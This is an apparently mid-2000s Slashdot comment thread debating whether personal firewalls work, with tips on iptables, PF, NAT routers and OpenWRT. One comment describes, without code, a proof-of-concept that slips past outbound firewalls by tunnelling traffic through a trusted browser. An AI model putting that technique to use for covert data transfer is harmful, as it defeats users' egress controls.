The beauty of iptables (Linux) or ipfilter (does pretty much the same thing on BSD, Solaris, and others) is the fact that by default, only root sets the parameters. That way, a malicious proggie, which would normally be running under normal user permissions, cannot mangle the firewall settings (so long as the perms on the conf files or the firewall binary aren't monkeyed with by the admin of the box).

Windows OTOH lets ordinary users bang around with the 'personal firewall' settings, even turning the thing off outright. Vista may change this (one would hope), but I wouldn't hold my breath.

iptables is a lot more subtle and flexible IMHO (e.g. it can control NAT routings), but Firestarter (if it isn't just a front-end for iptables anyway - not sure) should work okay for you as well, so long as only root can change the settings and turn it on/off.

/P

Biggest problem with personal firewalls

[totallygeek]

Okay, we are talking about Windows users: they will simply click 'Yes' to anything that pops up on the screen.

Re:Biggest problem with personal firewalls

[Geminii]

So why not make a virus which asks "Permanently kill your internet connection? [Yes] [No]" and let the problem take care of itself?

Better than nothing

[embracethenerdwithin]

I never assumed my software firewall was some amazing thing that kept me 100% safe. But I would still never want to surf without one. I don't care if it only protects against some attacks, it's definately better than none. I would rather be protected from a little than nothing.

My view has always been using a combination of things that help is th ebest idea. Using a router that has a hardware firewall + a software firewall + antivirue + a secure browser(firefox) is a decent way to keep safe. This won't stop everything, but it's better than surfing around with no protection. Also add not doing stupid things to that equation for maximum protection.

Re:Better than nothing

[embracethenerdwithin]

I forgot to mention using adawre or something like it. Thats also very helpful.

And if you don't want to use a firewall or anti virus, please come to my college and connect to the network. Wait 10 minutes while your computer gets owned.

Within 1 hour of moving into my apartment on campus, Zone alarm has logged almost 1,000 inbound access attempts...now that's scary.

More proof...

[blueZhift]

Meh, this is just more proof that PCs are just too hard for the average person to use. There's no way the typical user can easily follow the suggestions in the article. If anyone ever comes up with a good appliance-like device that does the things most people want to do online without worrying about viruses and trojans, the PC will be dead. I think that this complexity is leading into an era of coexistence for the home user wherein they resign themselves to sharing the computer with malware until it becomes unusable. Then they call for their favorite helpful neighbor geek, or just buy a new computer and start over again.

This article is useless

[classified]

The cited article fails to either list the tested firewall software, list the tests performed, or even link to some place where that information is available. It is a statement of the obvious, well known facts that: (i) some software fails to perform even its designed function, and (ii) correctly designed software is often misconfigured to the point where it cannot perform as designed.

The article further makes suggested solutions we have heard a thousand times, nothing new.

To meaningfully talk about security on a the average Joe's winbox, the focus has to come off average joe and be placed on the OS software companies, and on laws and rules (at least in the US) that utterly fail to require any software publisher to be responsible for either designing securable software, or providing adequate notice of the risks associated with installing or using software (or a website). Of course, malware and greyware writers will not follow those requirements ... but if average joe wanders down some dark internet alley without a condom on, its his own fault, whereas when average joe is going to a regular business site or using regular business software, the onus really should be on the publisher to disclose fully the risk, and to provide some tools to allow the user to understand what is going out.

With respect to malware that attaches without user intervention, IMO, all outbound traffic ought to be opt in, not opt out by default on OS install, and turning that off ought to be as hard as cancelling AOL (i.e. next to impossible).

I don't have a sig line, sorry.

Re:This article is useless

[atomic-penguin]

While I agree with the premise that most personal firewalls are crap. Like most personal firewall products, this article was useless.

Simple Solution - Live CD's, OK next problem...

[ScrewTivo]

I'm so tired of this I blogged it a while ago
http://millionfirefoxconverts.blogspot.com/

Trivial to Bypass

[ThinkFr33ly]

I always get a kick out of people who set their firewall to prompt on every attempt to access the net, especially when they're running as admin on their boxes.

Even without the user running as admin, it's fairly easy to create a program to bypass outgoing firewalls. Basically the trick is it piggypack your communications over an existing application that's trusted.

Nearly everybody is going to trust IE (or Firefox, or whatever browser) to access the network. All you have to do is figure out a way to use that program to do your communications for you.

I once wrote a proof of concept app (in VB no less!) that used IE to do exactly this. I setup a simple piece of server software that accepted requests via HTTP GETs and returned the response as base64 encoded text in an HTML body. When my app needed to access remote data I just used IE to request that data from the server and then base64 decoded it. I could have also done something like have the server software act as a proxy so I could request any remote data I wanted, even if it wasn't hosted by my server. It was trivial.

The best part was that *every* major outgoing firewall failed to detect this attempt, despite that fact they claim to be able to tell when one application is using another to piggyback communications. Perhaps it was the way the COM interface worked, I'm not sure... but it never failed and never prompted me to allow it to happen.

Re:Trivial to Bypass

[giuntag]

That's why I never set ZoneAlarm to let IE to the internet:
- use FF only as everyday web browser
- when doing windows update or visiting the occasional borked site, 'allow IE for this time only'

Of course you could script other tools like wget or curl to get to the web, but not many people would set those to 'always trusted', unless they are also used by some commercial app used on a daily basis.

This is a moot point anyway, since I fully agree with the opition expressed many times above, that Joe User has no clue at all about what to let through and what to forbid, when the question pops up.
ZA for example gives only the exe file name, which is a very poor hint, but even adding full directory, timestamp, exe version and such would not be of any help, let alone be dependable.

Re:Trivial to Bypass

[ThinkFr33ly]

Firefox is just as vulnerable to this technique as IE, although it takes a little more work to get the interop working.

Re:IP Tables

[mpapet]

Linux has IP Tables which is very good for the job. Is it as good as BSD? I would argue less time consuming if you already run Linux, but it's not the same.

Notes: I believe for stateful packet inspection, the kernel needs ip_conntrack and a few other things in it. Most distro kernels have this but it's worth double checking. From there, it's learning the IP tables syntax which isn't hard after going through one of the many examples out there. Once you get logging going, check out intrusion prevention systems!

http://www.google.com/search?hs=3PG&hl=en&lr=&clie nt=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q= iptables&btnG=Search

BSD firewall tutorial (was Re:misleading headline)

[badger.foo]

The manuscript at http://www.bgnett.no/~peter/pf/ is for a half day tutorial in setting up OpenBSD's PF firewall (also available on FreeBSD, NetBSD and DragonFlyBSD).

The response I get (yes, I'm the guy who wrote the tutorial) is that people find it quite useful.

The fact that it includes a few tips on how to give spammers a hard time helps too I guess.

In my experience software firewalls are invaluable

[brokeninside]

Of course, they aren't perfect. But I've a got a friend who was having a recurring problems with varioius malware. I set her up with Zone Alarm, Anti-Vir, Ad Aware and advised her to download Firefox to browse with rather than using IE. Without Zone Alarm to block the malware traffic while Anti-Vir downloaded updates to its signature files, her internet connection was saturated with so much malware traffic that she couldn't connect to anything else. Further, she gets to see what programs try to access the internet.

Someone needs to beat this guy with a clue stick

[wizkid]

Personal firewalls are more to protect from inbound attacks. Not to restrict outbound traffic. Yes, it also helps to inform you what programs $M wants to let out. When I build a XP system and put it on the net to put $M patches on it, if I don't have a personal firewall, it will be own'ed before I can finish patching. That seems like a useful thing to me.

DON'T LISTEN TO THIS MORON!!!

Re:You Mean Windows == Secure?

[mpapet]

I think the problem here is Software vs. Hardware firewalls.

No, that's not the problem. The problem is you've chosen to ignore the fundamental flaw of Windows.

Windows 3.1, 95, 98, 2000, XP (Longwait??) were never designed to run securely. BSD/*nix's are, from the kernel up. Are they invincible? No, but no OS is. Are they meaningfully better? Yes, very much so.

Now, if you still insist on believing the problem is not your OS.
1. Not one of my home customers would pay for a firewall what they paid for their PC!
2. A pix is not a magic bullet. It's good at it's job, but the windows desktop is still very vulnerable. (activex anyone?)

Please, for your own benefit look at the facts with a little more objectivity.

ISP's hate firewalls

[phorm]

I love how, whenever I go to my grandparents to fix their computer (after they've dealt with their ISP's tech support) the ethernet cable is always running straight to the PC and bypassing the router. It's hard enough to get average Joe to understand the usefulness of a hardware routing/firewall device, but when the ISP is actively having them bypass it I can see a software firewall being somewhat useful at times.

PFs cause misidentification of counterfeit SW?

[Brad+Eleven]

Remember the Microsoft Advantage flap earlier this year? I do. I have a copy of WinXP Pro, paid for, registered, all eyes dotted and tees crossed.

Then I get the "you may be the victim of counterfeiting" or somesuch. What????? Oh, my, was I angry. How dare they? I think I actually posted some ALL-CAPS message to M$, insisting that I was holding the receipt.

Now I've just remembered that the machine also features the free version of AG firewall, and how I was very miserly in allowing services to "access the Internet". M$ services, in particular. Like I don't even get the pictures in the left pane of the Search dialogue.

So I turned off the firewall and clicked the hazy grey little star in the taskbar, you know, the thing you get after you tell it to shut up about your counterfeit version of Windows.

Of course I got right to the "congratulations" page. Then I got a lovely invitation to download some very helpful M$ software.

So I turned the firewall back on.
--
"I want more life, father." ~Roy Batty

Re:You Mean Windows == Secure?

[nogginthenog]

Windows NT upwards (including 2000 & XP) was designed to run securely and has all the security features of Unixes. Windows 9x wasn't.

OpenWrt

most ppl already have a dedicated firewall machine.

Re:OpenWrt

[jank1887]

ummmm.... no. most people follow the most absolutely basic instructions they receive from Verizon/SBC/Comcast/RoadRunner/InsertOtherNameHere and hook their modem directly to their primary PC. they might have a software firewall, assuming they've been upgraded to SP2 by a knowledgable friend or WinUpdate. Most people just assume it's normal for their PC to get really slow after a couple months of use, and may have learned to do a reinstall by themselves. Or, there's the Geek Squad (or equivalent).

Not to be trusted.

[kahrytan]

who is M&G? I never heard of such magazine so I don't trust them.

With that said, I have actually considered upgrading to Netgear Prosafe Wired Router.

Portable Travel Routers

[joneshenry]

Looking at product manuals for portable travel routers, I see lots of claims about "stateful packet inspection firewalls" and "NAT", but these only apply when the router is being used to share an Internet connection with the ethernet port connected not to one's laptop but to say a hotel's room connection.

Is there any of these products that does the following: I plug my laptop into the router's ethernet port, I am able to configure the router through its web interface, the router connects to a wireless access point, the router then functions as a router for my laptop providing hardware firewall services?

Incomplete is not always "useless"

[Beryllium+Sphere(tm)]

An incomplete defense is useless in a chess game because your opponent will attack via the hole you left and you'll lose. If you're defending against ego-driven attackers or attackers who target you personally then it's appropriate to try for a security posture with no holes in it.

Mass-produced malware is usually not built for pride of workmanship. It is commercial software built to make money and is not a fraction better than it needs to be.

The right question to ask about effectiveness is what fraction of the spyware in circulation will be controlled by Zone Alarm and its kin. We accept a detection rate of 50-80% from antispyware programs. The threshold for a program like Zone Alarm should be higher because it has to be worth the hassles it causes, of course.

Those hassles are probably inevitable. If you try to control outgoing traffic you are trying to add a feature that should have been in the OS, namely a new permissions system. Turf wars with the OS and destabilization due to hooking deep APIs are certain to happen. Historically if you attempted to touch the Windows network stack (PGPNet, for example, and the Freedom software forced me into a wipe and reinstall) you broke it.

Outbound traffic controls are harder to subvert but less effective if you do them outside the client machine. How can a separate firewall box know whether a port is being opened by BitTorrent or by CoolWebSearch?

How did this end up on slashdot?!

[atlasdropperofworlds]

It did contain the tag "duh", but still....

Four Software Firewalls that Really Work!

[Hercules+Peanut]

I've been using these personal firewalls for years without a single occurance of malware or rooting. See for yourself, they run on a variety of architecture. They can be found here and here.

A couple of others that are nearly as good (in my personal experience) are here and here. .

Give them a try. You'll be impressed with the increased security.

Re:You Mean Windows 2k/xp == Unix?

[mpapet]

designed to run securely and has all the security features of Unixes.

And that's why you need a pix and an antivirus subscription and antispyware software and a NAT'd router on 2000/XP?

Denial, it's not just a river in Africa my friend.

Re:In my experience software firewalls are invalua

[joto]

Without Zone Alarm to block the malware traffic while Anti-Vir downloaded updates to its signature files, her internet connection was saturated with so much malware traffic that she couldn't connect to anything else.

In other words: If that is your main problem, by all means, use Zone Alarm. However, for normal users that simply want to "improve the security" of their systems, and not use some expert geek friend to clean their system of garbage they could have easily avoided in the first place, it doesn't work. Besides, most sane people would fix such a problem with a reformat, as if your friends system was that bad, there's surely other problems lurking too.

Further, she gets to see what programs try to access the internet.

Which is exactly why I stopped using zonealarm. Without zonealarm constantly pestering me about dangerous "attacks", either software I used would silently stop working because they needed net access, or I would need to allow most everything by default, reducing any effectivness of the firewall. A few weeks of clicking yellow dialog boxes, and you get enough. I didn't have a big problem with malicious software before ZA, and having the software equivalent of an annoying mum trying to warn you against stepping on something dangerous for every single step you take as you walk down the pavement, is just too annoying, too time-consuming, and too ridiculous. When you consider the additional implication, that you mum only notices the broken glass on the pavement, but never sees madman with the gun sneaking up on you from behind, it becomes even more obvious that it's only a big waste of time.

Re:No kidding... I've found them useless in practi

[budgenator]

Maybe a what-is button that actually told you what a program is,who wrote it, checked is signature, who the program was trying to talk to, and why the programs developer thought it important for the program to open a connection would help. Microsoft is a lot like Linux in one thing, they get blamed for a lot of stupid shit they have no control over right now and it's probably time for that to stop; there needs to be a signature program that's reasonably fair to big-time commercial, small-time commercial, and amature software developers writing for the windows platform. If it ain't signed and registered, it don't run period.

Just asking......

[LibertineR]

I would be interested in what Slashdotters think if ISA Server 2004? We have a number of clients who rely on it, and it would be instructive to discover any percieved flaws, or things that we should be looking out for? Thanks in advance.

Time travel?

[kybred]

Updated Firewalling with PF talk / Oppdatert Brannmur med PF-foredrag:

Engslish - updated 21 September 2006

I'm more interested in your time travel capabilities than your PF talk!

kybred

What of logs and ID?

[msobkow]

Sure you can use a hardware packet firewall for the essential functionality, but what of detailed logs, intrusion detection software, VPN solutions, SSH proxying, etc.?

Aside from that, the hardware firewalls can be cracked, and have been in the past. But they're harder to upgrade and repair when an OSS patch is released a few hours later.

People place too much faith in firewalls anyhow. Worse, a lot of them enable uPNP functionality, which becomes a gaping hole in the security because anything connected to the internal network can temporarily enable a port forward/masquerade. i.e. A uPNP exploit on the internal network means your external firewall is enslaved by the exploit, the same way admin rights allow an exploit to disable a software firewall on a Wintendo box.

Re:What of logs and ID?

[SillyNickName4me]

Sure you can use a hardware packet firewall for the essential functionality

And much more, depending on what you buy of course

, but what of detailed logs,

My linksys 'hardware firewall' runs a real syslog, and produces a nice duplicate of its log on another machine.

intrusion detection software,

If it isn't too big and you have the source.. my 'box' happens to run a simple snort configuration.

VPN solutions,

It also supports ipsec and as a nice bonus openvpn

SSH proxying, etc.?

Not just that, I can ssh into it and have a nice prompt..

Aside from that, the hardware firewalls can be cracked, and have been in the past.

Same for 'software firewalls'

But they're harder to upgrade and repair when an OSS patch is released a few hours later.

Now here is some news, you can have both.

You are of course quite correct about the faith people put in firewalls, they are a tool, not an all covering security solution.

Re:IP Tables

[msobkow]

openSuSE 10.1 actually makes it sickeningly easy to configure a firewall, subnet masquerading, DNS merging, and port forwarding. It took less than an two hours to get it all working (including dial-up and DHCP network alteration of the DNS forwarding.) IIRC it took almost two days to get it working with RedHat 5.2.

I realize it's not a fair comparison, as there is over 5 years of dev work in between the two, but the point is you don't need much knowledge, just a spare dual-nic box that'll run one of the more recent distros.

A friend of mine is a bit annoyed. It was faster and easier to set up SuSE's firewall and have it working reliably than his WinXP dial-up node. :P

most sane people would reinstall?

[brokeninside]

And just how would most sane people keep from getting infected again while updating Windows to a reasonably secure level? The average time it takes for a plain vanilla Windows install to get broken by malware is less than the amount of time it takes to navigate to Windows update.

I think that perhaps you disqualified yourself from the conversation with the admission that you've never had large problems with malware. There is a very large of people that have precisely that problem and, for those people, a decent firewall can be part of the solution.

Re:most sane people would reinstall?

[joto]

And just how would most sane people keep from getting infected again while updating Windows to a reasonably secure level? The average time it takes for a plain vanilla Windows install to get broken by malware is less than the amount of time it takes to navigate to Windows update.

Well, the point is that personal "application-level" firewalls do not help in protecting you from trojans. Which is what they are marketed as. If you are worried about people attacking you from the outside, simply use an external firewall/NAT appliance like everybody else. In addition to making you safe from the above-mentioned problem, it is hassle-free, relatively cheap, offers other advantages such as Internet sharing/home office networking/wireless, and protects you even when you haven't had time to install ZA or whatever personal firewall of choice you intend to use.

I think that perhaps you disqualified yourself from the conversation with the admission that you've never had large problems with malware. There is a very large of people that have precisely that problem and, for those people, a decent firewall can be part of the solution.

(First off, of course I've had problems with malware at some point in the past. It's just that I've learnt from my experiences, and now know what to do and what not to do. Most people, however seem unable to learn from experience. A bad driver usually stays a bad driver, etc... However...)

The people who are too stupid to make use of common sense on the Internet to avoid viruses and malware, are certainly too stupid to effectively make use of a personal firewall. I'm a professional, and I found it unworkable because it was just hassling me too much. An average user who can't even figure out what the never-ending popups from it means, will soon be conditioned into simply clicking "yes", which defeats the whole purpose. It's like having a doorman that looks mean, but lets anyone into the house, and even out of it again, carrying your TV, without even attempting to look at them.

A simple NAT-appliance protects even the stupid people, and because it's always on, even better than a personal firewall. I'll agree that ad-aware and antivirus might help some poor fucker who's already lost the race against malware (and even help protecting the stupid at times), but any the security product that increases "work" significantly more than it increases security, it just isn't worth the hassle. This includes personal firewalls. And unless you're trying out new executables, you don't need your antivirus taking up half the computers resources either.

What *I* want from a firewall/security system

I've by 1250 PST read every level 4 and above comment. But, for weeks now I've been wondering about a

firewall that is as first and last line of defense. How about a firewall that does this?:

-- Lets the user select folders that NO application is allowed to read

-- Not only warns the user that a banned folder is being subject to read attempts, but immediately

blocks access and performs a reverse lookup of the site and the app being used by that site, whether the

app is HTML, Java, C/C++ whether local or remote

-- not only shows the hex stream, but the PLAIN LANGUAGE (localized, of course) so the user can see what

is going on.

-- sets up a honeypot of tempting docs to cull a list of existing abusive sites and tributary sites so

an automatic blacklist can be performed.

-- lets me generate a list of keywords I ban and allows me to substitute words that actually get let out

of the system so the end-delivery is useless to the sniffing side

-- warns the user of encyrpted inbound and outbound traffic so the user can say, "Hey, I'm not actively

doing anything that warrants encryption, either site-initiated, or invoked by me. This way, I can be

suspicious of encrypted traffic that might be hiding contents lifted from my lan or disks.

See, what **I** am worried about is masked processes that sniff around my files and catalogs key or

interesting words, then waits for me to turn on some legitimate local or remote system-intensive app.

Once I've turned on a system-bogging app, the invasive app secretly slip-streams my gems into the

upstream info.

At this point, the attacker could then direct my nuggets to a legit site or one that LOOKS like one I

could trust, but maybe even THAT site or its spoof may have been "had", meaning I might never know to

where my data ultimately gets directed.

(Posting anonymously just in case i am being keystroked at work...)

David Syes

Re:BSD firewall tutorial (was Re:misleading headli

hey, i use your guide all the time.. it's good when you don't have the time to read all the man pages for pf, but i miss more about authpf is it as a super great feature

thanx from norway ;)

AVG

[GlL]

Step One: Uninstall all McAfee related products on your computer.

Step Two: Go to http://free.grisoft.com/ and download and install their FREE anti virus software.

Best fix for McAfee I have seen yet.

Idiotic article. Blame your tools.

[syousef]

This article basically says personal firewalls are useless because there are things they can't prevent. Recently I've seen someone argue antivirus software is useless because they aren't 100% accurate and won't catch all your virii. Okay well I have some screwdrivers at home. I want to put together a cupboard this evening. I'll only need the phillips head. Should I throw out the flathead since it won't do all my work for me? Moronic.

Yes, software firewalls have their problems. Yes, they do require some knowledge to use correctly (as does almost all software!)

Personally I use a hardware firewall for incoming, a software firewall for inbound, I do run as admin because Windows just isn't designed to be run well from an unprivlleged account. I use antivirus too though I do switch it off if my computer's going to be doing something CPU or disk intensive AND I'm not doing anything I consider risky.

Furthermore you can't test 6 bits of firewall software and extrapolate that they're all garbage from the sample.

HI_PORTS...

[tacocat]

I want to know how you are supposed to block ports from going outbound if you have to deal with this stupid FTP process that goes hi_port to hi_port... I can't remember right now what it's called because it's been a long time since I actually wrote my iptables firewall but this is something that was always strange to me.

Personal Firewall = Total Waste Of Time & Mone

[pandrijeczko]

If you run a desktop machine that has no need to run services to anyone on the Internet, then you do NOT need any firewall on the machine. Just spend $50 or £50 on a NAT router (and probably have wireless thrown in to boot), make sure you use a private IP address behind the router and do not open up any port mappings.

It *REALLY IS* that simple. Period.

Wrong idea in article

"Users who still prefer a firewall should first check whether they are using a router with firewall functionality. If so, then no firewall is needed, including the one build in to Windows XP, reports PC Professionell."

I remember a law enforcement officer I met saying how hard it was to use multiple firewalls, and you could hire his company to do it, LOL. He also recommended a hardware box, HOWEVER, the ones reading this, don't realize a NAT box, from a firewall. SO, IMHO, you should STILL use a software firewall. And learn about and how to use computers, because NO I am not coming over to fix yours!
While ZoneAlarm isn't the best firewall (best is a combination of firewalls, and knowledgeable users), it has helped with uneducated/undereducated pc users (my mother for example), tell when there computer is about to do something they don't want it to do.
Your first line of defense is ALWAYS you, who do you let use your pc, do you leave it connected, logged into, powered up by request, etc.

I disagree

These techniques like the POC provided usually use IE to send outgoing connections.

I personally block IE from accessing the Internet which renders that POC useless.

my solution

which I use at home is an old computer (was a 166MHZ CPU/32MB RAM, but is now a 300MHZ CPU/64MB RAM). A linux distro called IP COP which is based on a similar distro called smoothwall.

It turns your old computer into a dedicated firewall/router that operates under broadband, dialup and apparently now has wireless support. And if you add Mike's Hosts File to it then you have a a fairly easy setup for safer web surfing.

Combined wih using Mozilla Firefox/Thunderbird on the computers that connect through my IP COP distro. I've had very little issues with spyware, pop-up adverts and other misc headaches.

Re:Which software - little snitch on OSX

[vaporland]

Little Snitch on OSX works great at tracking / blocking outbound traffic.

Little Snitch only blocks outgoing traffic

[vaporland]

but works great otherwise

Re:Several home hardware firewalls are available

[zotz]

I was not asking about multiple internal ehternet ports but rather multiple ethernet interfaces.

all the best,

drew

But we already knew this!

[Baloo+Ursidae]

More and more security research come to the conclusion that personal firewalls are ineffective in controlling outbound traffic.

Duh! You're telling us what we already know. Anybody who hasn't been paying attention and blindly goes with "The article is flawed! Personal firewalls *really* work!" should be modded down -1 Dumbass until they show me the source for their personal firewall.

No test data, only "conclusions"...WTF

[FredThompson]

This reads like a shill piece. There's no data mentioned, only "statements" about the claimed state of software firewalls. My BS meter is starting to twitch...

Simply tested the wrong stuff...

[Hurricane78]

They should have added "Agnitum Outpost Firewall Pro" to their list. This piece of software - when all features are enabled - is some hard ass mofo in things of security.
For example: I click a link in a prog that's not allowed to connect. Now it opens in firefox. Which then is blocked too because it got manipulated by the program. I did not see that in others like panda, norton or some free ones.
Of course you can get this on linux. But it's much more work for the end-user. :\

Outpost is the first win-fw that i'm really happy with.
But sure: If you're in idiot and you disable half of the stuff and say "allow all" to every important security question, this helps nothing.
But don't you then just *DESERVE* to be filtered out by natural selection? ;)
(I would find it unfair for us otherwise!)

Which hardware?

[Futurepower(R)]

Which Linksys hardware do you use that supports OpenVPN?

Where did you get the firmware?

Re:Which hardware?

[SillyNickName4me]

A Linksys WRT54G v2.2, running OpenWRT with the OpenVPN package installed.

No doubt DD-WRT supports this as well.

The point of my post however is that a 'hardware firewall' is just another machine, it is nothing special. You could use a Linksys WRT54G or something compatible, which has some nice features (programmable switch with vlan support and hardware support for AES being the more obvious ones to me, but you could also use a small Soekris box and install for example MiniBSD on it and build the thing from scratch.

Either way you get a tiny, silent, dedicated box without any moving parts that implements your firewall.

Re:BSD firewall tutorial (was Re:misleading headli

I guess you complain about it taking more than one hour to learn how to drive a car as well? (Feel free to miss the point - you seem to have a talent for it.)

Re:lol

[Pieroxy]

My WRT is just fine and hasn't been rebooted in months with 2 bittorrent clients and a few emule shooting at it constantly. Plus the regular http, ftp and emails both ways. The WRT runs Linux just fine and it makes a hell of a router!

Re:Several home hardware firewalls are available

[Optic7]

Drew, I'm still not sure what you mean. Do you mean for example two internal and two external Ethernet interfaces, or different types of Ethernet connections (RJ45, Coax, AUI, etc)? Or something else completely? The firewalls that I listed have 5 Ethernet interfaces, one being for the external network (cable, DSL, etc), and the rest for the internal network, typically with at least one that can be set for DMZ.

Shenan

Re:Several home hardware firewalls are available

[zotz]

I may just be being dense today.

I have a wrt54g. It has and external interface and 4 ports that are on the internal interface and the wireless is also on the internal interface.

So, I have (in linux terms) eth0 connected to the net (24.244.xxx.xxx) and eth1 (192.168.100.1) on the inside. eth1 has multiple ports.

I am asking for something that can do:

eth0 (24.244.xxx.xxx)
eth1 (192.168.100.1)
eth2 (192.168.101.1)
eth3 (192.168.102.1)

at a minimum.

Someone else indicates that the wrt54g can do what I want. I need to investigate more.

Is my explanation clear now at least? Or should I try again to explain?

all the best,

drew
(da idea man)